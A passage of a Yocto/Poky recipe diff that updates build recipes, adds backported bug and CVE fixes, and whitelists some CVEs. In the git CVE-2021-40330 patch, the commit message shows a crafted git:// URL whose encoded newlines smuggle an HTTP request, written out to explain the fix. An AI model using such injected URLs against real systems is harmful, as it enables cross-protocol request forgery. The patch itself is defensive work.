file://0001-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ " diff --git a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb index 9a36cfe525..2a74a068f1 100644 --- a/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb +++ b/poky/meta/recipes-devtools/distcc/distcc_3.3.3.bb @@ -15,7 +15,7 @@ PACKAGECONFIG[popt] = "--without-included-popt,--with-included-popt,popt" RRECOMMENDS_${PN}-server = "avahi-daemon" -SRC_URI = "git://github.com/distcc/distcc.git \ +SRC_URI = "git://github.com/distcc/distcc.git;branch=master;protocol=https \ file://fix-gnome.patch \ file://separatebuilddir.patch \ file://default \ diff --git a/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch new file mode 100644 index 0000000000..57c2375a54 --- /dev/null +++ b/poky/meta/recipes-devtools/dnf/dnf/0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch @@ -0,0 +1,60 @@ +From c88a77198c0156e425c2725f30e481207de5162f Mon Sep 17 00:00:00 2001 +From: Jaroslav Mracek <jmracek@redhat.com> +Date: Tue, 3 Sep 2019 11:01:51 +0200 +Subject: [PATCH] Keep installed packages in upgrade job + (RhBug:1728252,1644241,1741381) + +In combination with marking of job as TARGETED it prevents from +reinstalling of modified packages with same NEVRA. + +https://bugzilla.redhat.com/show_bug.cgi?id=1728252 +https://bugzilla.redhat.com/show_bug.cgi?id=1644241 +https://bugzilla.redhat.com/show_bug.cgi?id=1741381 + +Closes: #1474 +Approved by: m-blaha + + +Backport to fix bug in dnf in oe-core +from https://github.com/rpm-software-management/dnf + +Removed spec file portion of patch + +Upstream-Status: Backport +Signed-off-by: Jate Sujjavanich <jatedev@gmail.com> +--- + dnf.spec | 4 ++-- + dnf/base.py | 3 --- + dnf/module/module_base.py | 2 +- + 3 files changed, 3 insertions(+), 6 deletions(-) + +diff --git a/dnf/base.py b/dnf/base.py +index b2ced61..628c154 100644 +--- a/dnf/base.py ++++ b/dnf/base.py +@@ -1968,9 +1968,6 @@ class Base(object): + obsoletes=q.installed().union(q.upgrades())) + # add obsoletes into transaction + q = q.union(obsoletes) +- # provide only available packages to solver otherwise selection of available +- # possibilities will be ignored +- q = q.available() + if reponame is not None: + q.filterm(reponame=reponame) + q = self._merge_update_filters(q, pkg_spec=pkg_spec) +diff --git a/dnf/module/module_base.py b/dnf/module/module_base.py +index 976d730..ce70f63 100644 +--- a/dnf/module/module_base.py ++++ b/dnf/module/module_base.py +@@ -214,7 +214,7 @@ class ModuleBase(object): + + if not upgrade_package_set: + logger.error(_("Unable to match profile in argument {}").format(spec)) +- query = self.base.sack.query().available().filterm(name=upgrade_package_set) ++ query = self.base.sack.query().filterm(name=upgrade_package_set) + if query: + sltr = dnf.selector.Selector(self.base.sack) + sltr.set(pkg=query) +-- +2.7.4 + diff --git a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb index 7831e1ac5a..6b6b233d6d 100644 --- a/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb +++ b/poky/meta/recipes-devtools/dnf/dnf_4.2.2.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263 \ file://PACKAGE-LICENSING;md5=4a0548e303dbc77f067335b4d688e745 \ " -SRC_URI = "git://github.com/rpm-software-management/dnf.git \ +SRC_URI = "git://github.com/rpm-software-management/dnf.git;branch=master;protocol=https \ file://0001-Corretly-install-tmpfiles.d-configuration.patch \ file://0001-Do-not-hardcode-etc-and-systemd-unit-directories.patch \ file://0005-Do-not-prepend-installroot-to-logdir.patch \ @@ -16,6 +16,7 @@ SRC_URI = "git://github.com/rpm-software-management/dnf.git \ file://0030-Run-python-scripts-using-env.patch \ file://Fix-SyntaxWarning.patch \ file://0001-set-python-path-for-completion_helper.patch \ + file://0040-Keep-installed-packages-in-upgrade-job-RhBug-1728252.patch \ " SRCREV = "9947306a55271b8b7c9e2b6e3b7d582885b6045d" diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc index 009f5ed807..45fb9720ee 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs.inc @@ -19,7 +19,7 @@ LIC_FILES_CHKSUM = "file://NOTICE;md5=d50be0580c0b0a7fbc7a4830bbe6c12b \ SECTION = "base" DEPENDS = "util-linux attr" -SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git" +SRC_URI = "git://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git;branch=master" S = "${WORKDIR}/git" inherit autotools gettext texinfo pkgconfig multilib_header update-alternatives ptest diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch deleted file mode 100644 index ba4e3a3c97..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch +++ /dev/null @@ -1,49 +0,0 @@ -From 71ba13755337e19c9a826dfc874562a36e1b24d3 Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o <tytso@mit.edu> -Date: Thu, 19 Dec 2019 19:45:06 -0500 -Subject: [PATCH] e2fsck: don't try to rehash a deleted directory - -If directory has been deleted in pass1[bcd] processing, then we -shouldn't try to rehash the directory in pass 3a when we try to -rehash/reoptimize directories. - -Signed-off-by: Theodore Ts'o <tytso@mit.edu> - -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=71ba13755337e19c9a826dfc874562a36e1b24d3] -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> ---- - e2fsck/pass1b.c | 4 ++++ - e2fsck/rehash.c | 2 ++ - 2 files changed, 6 insertions(+) - -diff --git a/e2fsck/pass1b.c b/e2fsck/pass1b.c -index 5693b9cf..bca701ca 100644 ---- a/e2fsck/pass1b.c -+++ b/e2fsck/pass1b.c -@@ -705,6 +705,10 @@ static void delete_file(e2fsck_t ctx, ext2_ino_t ino, - fix_problem(ctx, PR_1B_BLOCK_ITERATE, &pctx); - if (ctx->inode_bad_map) - ext2fs_unmark_inode_bitmap2(ctx->inode_bad_map, ino); -+ if (ctx->inode_reg_map) -+ ext2fs_unmark_inode_bitmap2(ctx->inode_reg_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_dir_map, ino); -+ ext2fs_unmark_inode_bitmap2(ctx->inode_used_map, ino); - ext2fs_inode_alloc_stats2(fs, ino, -1, LINUX_S_ISDIR(dp->inode.i_mode)); - quota_data_sub(ctx->qctx, &dp->inode, ino, - pb.dup_blocks * fs->blocksize); -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 3dd1e941..2c908be0 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -1028,6 +1028,8 @@ void e2fsck_rehash_directories(e2fsck_t ctx) - if (!ext2fs_u32_list_iterate(iter, &ino)) - break; - } -+ if (!ext2fs_test_inode_bitmap2(ctx->inode_dir_map, ino)) -+ continue; - - pctx.dir = ino; - if (first) { --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch deleted file mode 100644 index fc4a540986..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/0001-misc-create_inode.c-set-dir-s-mode-correctly.patch +++ /dev/null @@ -1,41 +0,0 @@ -From f6d188580c2c9599319076fee22f2424652c711c Mon Sep 17 00:00:00 2001 -From: Robert Yang <liezhi.yang@windriver.com> -Date: Wed, 13 Sep 2017 19:55:35 -0700 -Subject: [PATCH] misc/create_inode.c: set dir's mode correctly - -The dir's mode has been set by ext2fs_mkdir() with umask, so -reset it to the source's mode in set_inode_extra(). - -Fixed when source dir's mode is 521, but tarball would be 721, this was -incorrect. - -Upstream-Status: Submitted - -Signed-off-by: Robert Yang <liezhi.yang@windriver.com> ---- - misc/create_inode.c | 9 ++++++++- - 1 file changed, 8 insertions(+), 1 deletion(-) - -diff --git a/misc/create_inode.c b/misc/create_inode.c -index 8ce3faf..50fbaa8 100644 ---- a/misc/create_inode.c -+++ b/misc/create_inode.c -@@ -116,7 +116,14 @@ static errcode_t set_inode_extra(ext2_filsys fs, ext2_ino_t ino, - - inode.i_uid = st->st_uid; - inode.i_gid = st->st_gid; -- inode.i_mode |= st->st_mode; -+ /* -+ * The dir's mode has been set by ext2fs_mkdir() with umask, so -+ * reset it to the source's mode -+ */ -+ if S_ISDIR(st->st_mode) -+ inode.i_mode = LINUX_S_IFDIR | st->st_mode; -+ else -+ inode.i_mode |= st->st_mode; - inode.i_atime = st->st_atime; - inode.i_mtime = st->st_mtime; - inode.i_ctime = st->st_ctime; --- -2.10.2 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch deleted file mode 100644 index de4bce0037..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/CVE-2019-5188.patch +++ /dev/null @@ -1,57 +0,0 @@ -From 8dd73c149f418238f19791f9d666089ef9734dff Mon Sep 17 00:00:00 2001 -From: Theodore Ts'o <tytso@mit.edu> -Date: Thu, 19 Dec 2019 19:37:34 -0500 -Subject: [PATCH] e2fsck: abort if there is a corrupted directory block when - rehashing - -In e2fsck pass 3a, when we are rehashing directories, at least in -theory, all of the directories should have had corruptions with -respect to directory entry structure fixed. However, it's possible -(for example, if the user declined a fix) that we can reach this stage -of processing with a corrupted directory entries. - -So check for that case and don't try to process a corrupted directory -block so we don't run into trouble in mutate_name() if there is a -zero-length file name. - -Addresses: TALOS-2019-0973 -Addresses: CVE-2019-5188 -Signed-off-by: Theodore Ts'o <tytso@mit.edu> - -CVE: CVE-2019-5188 -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=8dd73c149f418238f19791f9d666089ef9734dff] ---- - e2fsck/rehash.c | 9 +++++++++ - 1 file changed, 9 insertions(+) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index a5fc1be1..3dd1e941 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -160,6 +160,10 @@ static int fill_dir_block(ext2_filsys fs, - dir_offset += rec_len; - if (dirent->inode == 0) - continue; -+ if ((name_len) == 0) { -+ fd->err = EXT2_ET_DIR_CORRUPTED; -+ return BLOCK_ABORT; -+ } - if (!fd->compress && (name_len == 1) && - (dirent->name[0] == '.')) - continue; -@@ -401,6 +405,11 @@ static int duplicate_search_and_fix(e2fsck_t ctx, ext2_filsys fs, - continue; - } - new_len = ext2fs_dirent_name_len(ent->dir); -+ if (new_len == 0) { -+ /* should never happen */ -+ ext2fs_unmark_valid(fs); -+ continue; -+ } - memcpy(new_name, ent->dir->name, new_len); - mutate_name(new_name, &new_len); - for (j=0; j < fd->num_array; j++) { --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch deleted file mode 100644 index 342a2b855b..0000000000 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsck-fix-use-after-free-in-calculate_tree.patch +++ /dev/null @@ -1,76 +0,0 @@ -From: Wang Shilong <wshilong@ddn.com> -Date: Mon, 30 Dec 2019 19:52:39 -0500 -Subject: e2fsck: fix use after free in calculate_tree() - -The problem is alloc_blocks() will call get_next_block() which might -reallocate outdir->buf, and memory address could be changed after -this. To fix this, pointers that point into outdir->buf, such as -int_limit and root need to be recaulated based on the new starting -address of outdir->buf. - -[ Changed to correctly recalculate int_limit, and to optimize how we - reallocate outdir->buf. -TYT ] - -Addresses-Debian-Bug: 948517 -Signed-off-by: Wang Shilong <wshilong@ddn.com> -Signed-off-by: Theodore Ts'o <tytso@mit.edu> -(cherry picked from commit 101e73e99ccafa0403fcb27dd7413033b587ca01) - -Signed-off-by: Anuj Mittal <anuj.mittal@intel.com> -Upstream-Status: Backport [https://git.kernel.org/pub/scm/fs/ext2/e2fsprogs.git/commit/?id=101e73e99ccafa0403fcb27dd7413033b587ca01] ---- - e2fsck/rehash.c | 17 ++++++++++++++++- - 1 file changed, 16 insertions(+), 1 deletion(-) - -diff --git a/e2fsck/rehash.c b/e2fsck/rehash.c -index 0a5888a9..2574e151 100644 ---- a/e2fsck/rehash.c -+++ b/e2fsck/rehash.c -@@ -295,7 +295,11 @@ static errcode_t get_next_block(ext2_filsys fs, struct out_dir *outdir, - errcode_t retval; - - if (outdir->num >= outdir->max) { -- retval = alloc_size_dir(fs, outdir, outdir->max + 50); -+ int increment = outdir->max / 10; -+ -+ if (increment < 50) -+ increment = 50; -+ retval = alloc_size_dir(fs, outdir, outdir->max + increment); - if (retval) - return retval; - } -@@ -637,6 +641,9 @@ static int alloc_blocks(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ *prev_ent = (struct ext2_dx_entry *) (outdir->buf + *prev_offset); -+ - *next_ent = set_int_node(fs, block_start); - *limit = (struct ext2_dx_countlimit *)(*next_ent); - if (next_offset) -@@ -726,6 +733,9 @@ static errcode_t calculate_tree(ext2_filsys fs, - return retval; - } - if (c3 == 0) { -+ int delta1 = (char *)int_limit - outdir->buf; -+ int delta2 = (char *)root - outdir->buf; -+ - retval = alloc_blocks(fs, &limit, &int_ent, - &dx_ent, &int_offset, - NULL, outdir, i, &c2, -@@ -733,6 +743,11 @@ static errcode_t calculate_tree(ext2_filsys fs, - if (retval) - return retval; - -+ /* outdir->buf might be reallocated */ -+ int_limit = (struct ext2_dx_countlimit *) -+ (outdir->buf + delta1); -+ root = (struct ext2_dx_entry *) -+ (outdir->buf + delta2); - } - dx_ent->block = ext2fs_cpu_to_le32(i); - if (c3 != limit->limit) --- -2.24.1 - diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch index 4d335af4cf..284ac90196 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/e2fsprogs-fix-missing-check-for-permission-denied.patch @@ -1,4 +1,4 @@ -From e8331a76983e839a3d193446ab8ae9c1b09daa07 Mon Sep 17 00:00:00 2001 +From b55dfb4b62e507ae4f0814aec7597b56f9d6292a Mon Sep 17 00:00:00 2001 From: Jackie Huang <jackie.huang@windriver.com> Date: Wed, 10 Aug 2016 11:19:44 +0800 Subject: [PATCH] Fix missing check for permission denied. diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch index 95e6a7a2d5..aac88eed98 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs/quiet-debugfs.patch @@ -1,4 +1,4 @@ -From de6d6f0dd010f5b9d917553acb9430278f448f23 Mon Sep 17 00:00:00 2001 +From 9aa68ad81b97847dda3493145f4b0a7cc580c551 Mon Sep 17 00:00:00 2001 From: Ross Burton <ross.burton@intel.com> Date: Mon, 23 Dec 2013 13:38:34 +0000 Subject: [PATCH] e2fsprogs: silence debugfs diff --git a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb index 2eae9cd892..3bc530e02b 100644 --- a/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.4.bb +++ b/poky/meta/recipes-devtools/e2fsprogs/e2fsprogs_1.45.7.bb @@ -4,12 +4,8 @@ SRC_URI += "file://remove.ldconfig.call.patch \ file://run-ptest \ file://ptest.patch \ file://mkdir_p.patch \ - file://0001-misc-create_inode.c-set-dir-s-mode-correctly.patch \ file://0001-configure.ac-correct-AM_GNU_GETTEXT.patch \ file://0001-intl-do-not-try-to-use-gettext-defines-that-no-longe.patch \ - file://CVE-2019-5188.patch \ - file://0001-e2fsck-don-t-try-to-rehash-a-deleted-directory.patch \ - file://e2fsck-fix-use-after-free-in-calculate_tree.patch \ " SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permission-denied.patch \ @@ -17,7 +13,7 @@ SRC_URI_append_class-native = " file://e2fsprogs-fix-missing-check-for-permissio file://big-inodes-for-small-fs.patch \ " -SRCREV = "984ff8d6a0a1d5dc300505f67b38ed5047d51dac" +SRCREV = "5403970e44241cec26f98aaa0124b9881b4bbf4f" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>\d+\.\d+(\.\d+)*)$" EXTRA_OECONF += "--libdir=${base_libdir} --sbindir=${base_sbindir} \ diff --git a/poky/meta/recipes-devtools/file/file_5.38.bb b/poky/meta/recipes-devtools/file/file_5.38.bb index 2d62ead10b..b19bf03986 100644 --- a/poky/meta/recipes-devtools/file/file_5.38.bb +++ b/poky/meta/recipes-devtools/file/file_5.38.bb @@ -11,7 +11,7 @@ LIC_FILES_CHKSUM = "file://COPYING;beginline=2;md5=0251eaec1188b20d9a72c502ecfdd DEPENDS = "file-replacement-native" DEPENDS_class-native = "bzip2-replacement-native" -SRC_URI = "git://github.com/file/file.git" +SRC_URI = "git://github.com/file/file.git;branch=master;protocol=https" SRCREV = "ec41083645689a787cdd00cb3b5bf578aa79e46c" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb index 1d43d2228a..50d3bf8de1 100644 --- a/poky/meta/recipes-devtools/flex/flex_2.6.4.bb +++ b/poky/meta/recipes-devtools/flex/flex_2.6.4.bb @@ -26,6 +26,11 @@ SRC_URI[sha256sum] = "e87aae032bf07c26f85ac0ed3250998c37621d95f8bd748b31f15b33c4 UPSTREAM_CHECK_URI = "https://github.com/westes/flex/releases" UPSTREAM_CHECK_REGEX = "flex-(?P<pver>\d+(\.\d+)+)\.tar" +# Disputed - yes there is stack exhaustion but no bug and it is building the +# parser, not running it, effectively similar to a compiler ICE. Upstream no plans to address +# https://github.com/westes/flex/issues/414 +CVE_CHECK_WHITELIST += "CVE-2019-6293" + inherit autotools gettext texinfo ptest M4 = "${bindir}/m4" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc index 1c8e3df51d..c171f673e9 100644 --- a/poky/meta/recipes-devtools/gcc/gcc-9.3.inc +++ b/poky/meta/recipes-devtools/gcc/gcc-9.3.inc @@ -69,6 +69,7 @@ SRC_URI = "\ file://0037-CVE-2019-14250-Check-zero-value-in-simple_object_elf.patch \ file://0038-gentypes-genmodes-Do-not-use-__LINE__-for-maintainin.patch \ file://0039-process_alt_operands-Don-t-match-user-defined-regs-o.patch \ + file://0040-fix-missing-dependencies-for-selftests.patch \ file://0001-aarch64-New-Straight-Line-Speculation-SLS-mitigation.patch \ file://0002-aarch64-Introduce-SLS-mitigation-for-RET-and-BR-inst.patch \ file://0003-aarch64-Mitigate-SLS-for-BLR-instruction.patch \ @@ -123,3 +124,6 @@ EXTRA_OECONF_PATHS = "\ --with-sysroot=/not/exist \ --with-build-sysroot=${STAGING_DIR_TARGET} \ " + +# Is a binutils 2.26 issue, not gcc +CVE_CHECK_WHITELIST += "CVE-2021-37322" diff --git a/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch new file mode 100644 index 0000000000..c8960c6098 --- /dev/null +++ b/poky/meta/recipes-devtools/gcc/gcc-9.3/0040-fix-missing-dependencies-for-selftests.patch @@ -0,0 +1,45 @@ +From b19d8aac15649f31a7588b2634411a1922906ea8 Mon Sep 17 00:00:00 2001 +From: Romain Naour <romain.naour@gmail.com> +Date: Wed, 3 Jun 2020 12:30:57 -0600 +Subject: [PATCH] Fix missing dependencies for selftests which occasionally + causes failed builds. + +gcc/ + + * Makefile.in (SELFTEST_DEPS): Move before including language makefile + fragments. + +Upstream-Status: Backport [https://gcc.gnu.org/git/?p=gcc.git;a=commitdiff;h=b19d8aac15649f31a7588b2634411a1922906ea8] +Signed-off-by:Steve Sakoman <steve@sakoman.com> + +--- + gcc/Makefile.in | 6 ++++-- + 1 file changed, 4 insertions(+), 2 deletions(-) + +diff --git a/gcc/Makefile.in b/gcc/Makefile.in +index aab1dbba57b..be11311b60d 100644 +--- a/gcc/Makefile.in ++++ b/gcc/Makefile.in +@@ -1735,6 +1735,10 @@ $(FULL_DRIVER_NAME): ./xgcc$(exeext) + $(LN_S) $< $@ + + # ++# SELFTEST_DEPS need to be set before including language makefile fragments. ++# Otherwise $(SELFTEST_DEPS) is empty when used from <LANG>/Make-lang.in. ++SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests ++ + # Language makefile fragments. + + # The following targets define the interface between us and the languages. +@@ -2010,8 +2014,6 @@ DEVNULL=$(if $(findstring mingw,$(build)),nul,/dev/null) + SELFTEST_FLAGS = -nostdinc $(DEVNULL) -S -o $(DEVNULL) \ + -fself-test=$(srcdir)/testsuite/selftests + +-SELFTEST_DEPS = $(GCC_PASSES) stmp-int-hdrs $(srcdir)/testsuite/selftests +- + # Run the selftests during the build once we have a driver and the frontend, + # so that self-test failures are caught as early as possible. + # Use "s-selftest-FE" to ensure that we only run the selftests if the +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch new file mode 100644 index 0000000000..725f98f0b7 --- /dev/null +++ b/poky/meta/recipes-devtools/git/files/CVE-2021-40330.patch @@ -0,0 +1,108 @@ +From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001 +From: Minjae Kim <flowergom@gmail.com> +Date: Thu, 25 Nov 2021 06:36:26 +0000 +Subject: [PATCH] git_connect_git(): forbid newlines in host and path + +When we connect to a git:// server, we send an initial request that +looks something like: + + 002dgit-upload-pack repo.git\0host=example.com + +If the repo path contains a newline, then it's included literally, and +we get: + + 002egit-upload-pack repo + .git\0host=example.com + +This works fine if you really do have a newline in your repository name; +the server side uses the pktline framing to parse the string, not +newlines. However, there are many _other_ protocols in the wild that do +parse on newlines, such as HTTP. So a carefully constructed git:// URL +can actually turn into a valid HTTP request. For example: + + git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a + +becomes: + + 0050git-upload-pack / + GET / HTTP/1.1 + Host:localhost + + host=localhost:1234 + +on the wire. Again, this isn't a problem for a real Git server, but it +does mean that feeding a malicious URL to Git (e.g., through a +submodule) can cause it to make unexpected cross-protocol requests. +Since repository names with newlines are presumably quite rare (and +indeed, we already disallow them in git-over-http), let's just disallow +them over this protocol. + +Hostnames could likewise inject a newline, but this is unlikely a +problem in practice; we'd try resolving the hostname with a newline in +it, which wouldn't work. Still, it doesn't hurt to err on the side of +caution there, since we would not expect them to work in the first +place. + +The ssh and local code paths are unaffected by this patch. In both cases +we're trying to run upload-pack via a shell, and will quote the newline +so that it makes it intact. An attacker can point an ssh url at an +arbitrary port, of course, but unless there's an actual ssh server +there, we'd never get as far as sending our shell command anyway. We +_could_ similarly restrict newlines in those protocols out of caution, +but there seems little benefit to doing so. + +The new test here is run alongside the git-daemon tests, which cover the +same protocol, but it shouldn't actually contact the daemon at all. In +theory we could make the test more robust by setting up an actual +repository with a newline in it (so that our clone would succeed if our +new check didn't kick in). But a repo directory with newline in it is +likely not portable across all filesystems. Likewise, we could check +git-daemon's log that it was not contacted at all, but we do not +currently record the log (and anyway, it would make the test racy with +the daemon's log write). We'll just check the client-side stderr to make +sure we hit the expected code path. + +Reported-by: Harold Kim <h.kim@flatt.tech> +Signed-off-by: Jeff King <peff@peff.net> +Signed-off-by: Junio C Hamano <gitster@pobox.com> + +Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473] +CVE: CVE-2021-40330 +Signed-off-by: Minjae Kim <flowergom@gmail.com> +--- + connect.c | 2 ++ + t/t5570-git-daemon.sh | 5 +++++ + 2 files changed, 7 insertions(+) + +diff --git a/connect.c b/connect.c +index b6451ab..929de9a 100644 +--- a/connect.c ++++ b/connect.c +@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport, + target_host = xstrdup(hostandport); + + transport_check_allowed("git"); ++ if (strchr(target_host, '\n') || strchr(path, '\n')) ++ die(_("newline is forbidden in git:// hosts and repo paths")); + + /* + * These underlying connection commands die() if they +diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh +index 34487bb..79cd218 100755 +--- a/t/t5570-git-daemon.sh ++++ b/t/t5570-git-daemon.sh +@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' ' + ) + ' + ++test_expect_success 'client refuses to ask for repo with newline' ' ++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr && ++ test_i18ngrep newline.is.forbidden stderr ++' ++ + test_remote_error() + { + do_export=YesPlease +-- +2.17.1 + diff --git a/poky/meta/recipes-devtools/git/git.inc b/poky/meta/recipes-devtools/git/git.inc index 738a429875..a89dd42e8b 100644 --- a/poky/meta/recipes-devtools/git/git.inc +++ b/poky/meta/recipes-devtools/git/git.inc @@ -10,7 +10,9 @@ PROVIDES_append_class-native = " git-replacement-native" SRC_URI = "${KERNELORG_MIRROR}/software/scm/git/git-${PV}.tar.gz;name=tarball \ ${KERNELORG_MIRROR}/software/scm/git/git-manpages-${PV}.tar.gz;name=manpages \ file://CVE-2021-21300.patch \ -" + file://fixsort.patch \ + file://CVE-2021-40330.patch \ + " S = "${WORKDIR}/git-${PV}" diff --git a/poky/meta/recipes-devtools/git/git/fixsort.patch b/poky/meta/recipes-devtools/git/git/fixsort.patch new file mode 100644 index 0000000000..eec1f84945 --- /dev/null +++ b/poky/meta/recipes-devtools/git/git/fixsort.patch @@ -0,0 +1,36 @@ +[PATCH] generate-cmdlist.sh: Fix determinism issue + +Currently git binaries are not entirely reproducible, at least partly +due to config-list.h differing in order depending on the system's +locale settings. Under different locales, the entries: + +"sendemail.identity", +"sendemail.<identity>.*", + +would differ in order for example and this leads to differences in +the debug symbols for the binaries. + +This can be fixed by specifying the C locale for the sort in the +shell script generating the header. + +Note: This is a backport of Richard Purdie's original patch for a more +recent version of git. The offending code in this older version is +in generate-cmdlist.sh. The upstream current version has this code +in generate-configlist.sh. + +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> +Signed-off-by: Steve Sakoman <steve@sakoman.com> +Upstream-Status: Submitted [https://public-inbox.org/git/f029a942dd3d50d85e60bd37d8e454524987842f.camel@linuxfoundation.org/T/#u] + +index 71158f7..c137091 100755 +--- a/generate-cmdlist.sh ++++ b/generate-cmdlist.sh +@@ -82,7 +82,7 @@ static const char *config_name_list[] = { + EOF + grep -h '^[a-zA-Z].*\..*::$' Documentation/*config.txt Documentation/config/*.txt | + sed '/deprecated/d; s/::$//; s/, */\n/g' | +- sort | ++ LC_ALL=C sort | + while read line + do + echo " \"$line\"," diff --git a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb index 6eb87df7c3..21773d91f9 100644 --- a/poky/meta/recipes-devtools/glide/glide_0.13.3.bb +++ b/poky/meta/recipes-devtools/glide/glide_0.13.3.bb @@ -5,7 +5,7 @@ LICENSE = "MIT" LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2" GO_IMPORT = "github.com/Masterminds/glide" -SRC_URI = "git://${GO_IMPORT}" +SRC_URI = "git://${GO_IMPORT};branch=master" SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf" inherit go diff --git a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb index 7299a1d4a4..df8947e425 100644 --- a/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb +++ b/poky/meta/recipes-devtools/gnu-config/gnu-config_git.bb @@ -12,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1" SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0" PV = "20200117+git${SRCPV}" -SRC_URI = "git://git.savannah.gnu.org/config.git \ +SRC_URI = "git://git.savannah.gnu.org/config.git;branch=master \ file://gnu-configize.in" S = "${WORKDIR}/git" UPSTREAM_CHECK_COMMITS 